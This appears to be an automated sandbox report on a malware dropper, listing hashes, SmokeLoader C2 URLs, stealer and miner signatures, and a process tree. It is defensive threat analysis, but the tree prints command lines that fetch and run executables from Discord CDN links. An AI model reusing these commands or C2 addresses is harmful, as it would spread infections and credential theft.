Resubmissions

19-10-2021 08:05

211019-jyy3zsgcem 10

18-10-2021 18:38

211018-w97wgsecc3 10

Analysis

  • max time kernel
    250s
  • max time network
    1806s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    19-10-2021 08:05

General

  • Target

    Setup.exe

  • Size

    425KB

  • MD5

    93d44fa2ceefa5dab55b3b4d89c5c3de

  • SHA1

    5af7a4e78c39b15e8d94a6c8ea247c96734ecca5

  • SHA256

    8bd004298abd06e9e01067f14ca55f5d5cc899c37fc03c7b0cc3eb6702c84437

  • SHA512

    b481bbf8551a9d56e8161b15661ab6c08f5d024f8ccb0e842d1d2db82f80a401dd8ed3892fa8a917dcddb198c91bd5eca678093ff1b263a2194d4cc47ec65977

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://gejajoo7.top/

http://sysaheu9.top/

http://gfdjgdfjgdhfbg.space/

http://gfhjdsghdfjg23.space/

http://gdfjgdfh4543nf.space/

http://fgdjgsdfghj4fds.space/

http://fgdgdjfgfdgdf.space/

http://fsdhjfsdhfsd.space/

http://fgdsjghdfghjdfhgd.space/

http://ryuesrseyth3.space/

http://fdsjkuhreyu4.space/

http://fdgjdfgehr4.space/

http://fgdgjhdfgdfjgd.space/

rc4.i32
rc4.i32
rc4.i32
rc4.i32

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 17 IoCs
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • suricata: ET MALWARE Amadey CnC Check-In

    suricata: ET MALWARE Amadey CnC Check-In

  • suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

    suricata: ET MALWARE EXE Download Request To Wordpress Folder Likely Malicious

  • suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

    suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01

  • suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

    suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Modifies Windows Firewall 1 TTPs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 12 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 7 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 11 IoCs
  • Enumerates connected drives 3 TTPs 64 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 29 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 18 IoCs
  • NSIS installer 4 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Enumerates system info in registry 2 TTPs 37 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 46 IoCs
  • Modifies registry class 8 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 8 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 5 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Setup.exe
    "C:\Users\Admin\AppData\Local\Temp\Setup.exe"
    1⤵
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:3900
    • C:\Users\Admin\Pictures\Adobe Films\eEGpwAFaiH5Tn6mwEgGJ9xt_.exe
      "C:\Users\Admin\Pictures\Adobe Films\eEGpwAFaiH5Tn6mwEgGJ9xt_.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious behavior: EnumeratesProcesses
      PID:1872
    • C:\Users\Admin\Pictures\Adobe Films\PSrNEL7YgEJZ0xyCqQYVkq2R.exe
      "C:\Users\Admin\Pictures\Adobe Films\PSrNEL7YgEJZ0xyCqQYVkq2R.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:1080
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\FAD7.bat "C:\Users\Admin\Pictures\Adobe Films\PSrNEL7YgEJZ0xyCqQYVkq2R.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1516
        • C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe
          C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
          4⤵
          • Executes dropped EXE
          PID:3256
        • C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe
          C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899922141728886806/899922156077596692/11.exe" "11.exe" "" "" "" "" "" ""
          4⤵
          • Executes dropped EXE
          PID:1936
        • C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe
          C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/899922141728886806/899922177439191050/Transmissibility.exe" "Transmissibility.exe" "" "" "" "" "" ""
          4⤵
          • Executes dropped EXE
          PID:3516
        • C:\Users\Admin\AppData\Local\Temp\10782\11.exe
          11.exe
          4⤵
          • Executes dropped EXE
          PID:4292
        • C:\Users\Admin\AppData\Local\Temp\10782\Transmissibility.exe
          Transmissibility.exe
          4⤵
          • Executes dropped EXE
          PID:4992
        • C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe
          C:\Users\Admin\AppData\Local\Temp\FAD5.tmp\FAD6.tmp\extd.exe "" "" "" "" "" "" "" "" ""
          4⤵
          • Executes dropped EXE
          PID:4848
    • C:\Users\Admin\Pictures\Adobe Films\RD7xOcy3VQHmAwSgZbhezd8B.exe
      "C:\Users\Admin\Pictures\Adobe Films\RD7xOcy3VQHmAwSgZbhezd8B.exe"
      2⤵
      • Executes dropped EXE
      PID:1244
      • C:\Windows\SysWOW64\WerFault.exe
        C:\Windows\SysWOW64\WerFault.exe -u -p 1244 -s 296
        3⤵
        • Program crash
        • Checks processor information in registry
        • Enumerates system info in registry
        • Suspicious use of AdjustPrivilegeToken
        PID:3692
    • C:\Users\Admin\Pictures\Adobe Films\yuXeMxxM0BfMLtDDhBTtQsDP.exe
      "C:\Users\Admin\Pictures\Adobe Films\yuXeMxxM0BfMLtDDhBTtQsDP.exe"
      2⤵
      • Executes dropped EXE
      PID:3132
      • C:\Users\Admin\Documents\uL5L3V3osNAsffBCSX6lDR_a.exe
        "C:\Users\Admin\Documents\uL5L3V3osNAsffBCSX6lDR_a.exe"
        3⤵
        • Executes dropped EXE
        PID:4308
        • C:\Users\Admin\Pictures\Adobe Films\ZGNpAqpmaPDLoM65XACxqexp.exe
          "C:\Users\Admin\Pictures\Adobe Films\ZGNpAqpmaPDLoM65XACxqexp.exe"
          4⤵
          • Executes dropped EXE
          PID:3708
        • C:\Users\Admin\Pictures\Adobe Films\_52YqC1xoN2nJyiPlEUAxEMy.exe
          "C:\Users\Admin\Pictures\Adobe Films\_52YqC1xoN2nJyiPlEUAxEMy.exe" /mixtwo
          4⤵
          • Executes dropped EXE
          PID:5328
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5328 -s 292
            5⤵
            • Program crash
            • Checks processor information in registry
            • Enumerates system info in registry
            PID:5936
        • C:\Users\Admin\Pictures\Adobe Films\vCb_ITY6AL7dTgGs36nKl_Yo.exe
          "C:\Users\Admin\Pictures\Adobe Films\vCb_ITY6AL7dTgGs36nKl_Yo.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          PID:5444
        • C:\Users\Admin\Pictures\Adobe Films\m8vJyQQTxNnnbI7OvxWcWqMc.exe
          "C:\Users\Admin\Pictures\Adobe Films\m8vJyQQTxNnnbI7OvxWcWqMc.exe"
          4⤵
          • Executes dropped EXE
          PID:5476
        • C:\Users\Admin\Pictures\Adobe Films\33BHucR49cevMh8DhI5Gch69.exe
          "C:\Users\Admin\Pictures\Adobe Films\33BHucR49cevMh8DhI5Gch69.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          PID:5672
          • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
            C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            • Adds Run key to start application
            PID:5848
            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--XpjC5"
              6⤵
              • Loads dropped DLL
              PID:8632
              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x234,0x238,0x23c,0x210,0x240,0x7ffcc883dec0,0x7ffcc883ded0,0x7ffcc883dee0
                7⤵
                • Loads dropped DLL
                PID:8936
                • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                  C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ff632ee9e70,0x7ff632ee9e80,0x7ff632ee9e90
                  8⤵
                  • Loads dropped DLL
                  PID:9008
              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1724,3070477258772292316,2647162192763611853,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8632_1270196219" --mojo-platform-channel-handle=1788 /prefetch:8
                7⤵
                • Loads dropped DLL
                PID:9460
              • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1724,3070477258772292316,2647162192763611853,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw8632_1270196219" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1740 /prefetch:2
                7⤵
                • Loads dropped DLL
                PID:9444
        • C:\Users\Admin\Pictures\Adobe Films\MgfK7sdY6ayqDIIEjBhcUIUp.exe
          "C:\Users\Admin\Pictures\Adobe Films\MgfK7sdY6ayqDIIEjBhcUIUp.exe"
          4⤵
          • Executes dropped EXE
          PID:5712
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 5712 -s 296
            5⤵
            • Program crash
            • Checks processor information in registry
            • Enumerates system info in registry
            PID:3948
        • C:\Users\Admin\Pictures\Adobe Films\GDP5Gq5p3Y41kH0ygZ5p6eSl.exe
          "C:\Users\Admin\Pictures\Adobe Films\GDP5Gq5p3Y41kH0ygZ5p6eSl.exe"
          4⤵
          • Executes dropped EXE
          PID:5700
          • C:\Users\Admin\AppData\Local\Temp\is-78MSI.tmp\GDP5Gq5p3Y41kH0ygZ5p6eSl.tmp
            "C:\Users\Admin\AppData\Local\Temp\is-78MSI.tmp\GDP5Gq5p3Y41kH0ygZ5p6eSl.tmp" /SL5="$7021A,506127,422400,C:\Users\Admin\Pictures\Adobe Films\GDP5Gq5p3Y41kH0ygZ5p6eSl.exe"
            5⤵
            • Executes dropped EXE
            • Loads dropped DLL
            PID:6028
            • C:\Users\Admin\AppData\Local\Temp\is-KLUOL.tmp\ShareFolder.exe
              "C:\Users\Admin\AppData\Local\Temp\is-KLUOL.tmp\ShareFolder.exe" /S /UID=2709
              6⤵
              • Drops file in Drivers directory
              • Executes dropped EXE
              • Adds Run key to start application
              • Drops file in Program Files directory
              PID:5708
              • C:\Program Files\Common Files\YAKWFFCKGL\foldershare.exe
                "C:\Program Files\Common Files\YAKWFFCKGL\foldershare.exe" /VERYSILENT
                7⤵
                • Executes dropped EXE
                PID:6020
              • C:\Users\Admin\AppData\Local\Temp\19-da6f1-f1d-ebc9c-198788a14ea7a\Lahypaekuwe.exe
                "C:\Users\Admin\AppData\Local\Temp\19-da6f1-f1d-ebc9c-198788a14ea7a\Lahypaekuwe.exe"
                7⤵
                • Executes dropped EXE
                PID:764
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                  8⤵
                  • Adds Run key to start application
                  • Enumerates system info in registry
                  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                  • Suspicious use of FindShellTrayWindow
                  PID:7784
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec4718
                    9⤵
                      PID:7844
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2160 /prefetch:2
                      9⤵
                        PID:9688
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2268 /prefetch:3
                        9⤵
                          PID:9736
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2732 /prefetch:8
                          9⤵
                            PID:10032
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3588 /prefetch:1
                            9⤵
                              PID:10732
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:1
                              9⤵
                                PID:10808
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4924 /prefetch:1
                                9⤵
                                  PID:11332
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5204 /prefetch:1
                                  9⤵
                                    PID:12100
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5056 /prefetch:1
                                    9⤵
                                      PID:12116
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 /prefetch:8
                                      9⤵
                                        PID:12872
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.62\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2696 /prefetch:8
                                        9⤵
                                          PID:12944
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5784 /prefetch:2
                                          9⤵
                                            PID:15188
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:1
                                            9⤵
                                              PID:15868
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3364 /prefetch:1
                                              9⤵
                                                PID:15928
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3956 /prefetch:1
                                                9⤵
                                                  PID:6196
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5520 /prefetch:1
                                                  9⤵
                                                    PID:5064
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3680 /prefetch:1
                                                    9⤵
                                                      PID:7444
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1792 /prefetch:1
                                                      9⤵
                                                        PID:2896
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
                                                        9⤵
                                                          PID:2296
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1740 /prefetch:1
                                                          9⤵
                                                            PID:10088
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,8025276616079518766,7557934879715642623,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3816 /prefetch:1
                                                            9⤵
                                                              PID:10768
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                            8⤵
                                                              PID:15788
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xe4,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec4718
                                                                9⤵
                                                                  PID:15812
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                8⤵
                                                                  PID:4704
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0xdc,0x108,0x100,0x10c,0x7ffcb8ec46f8,0x7ffcb8ec4708,0x7ffcb8ec4718
                                                                    9⤵
                                                                      PID:3316
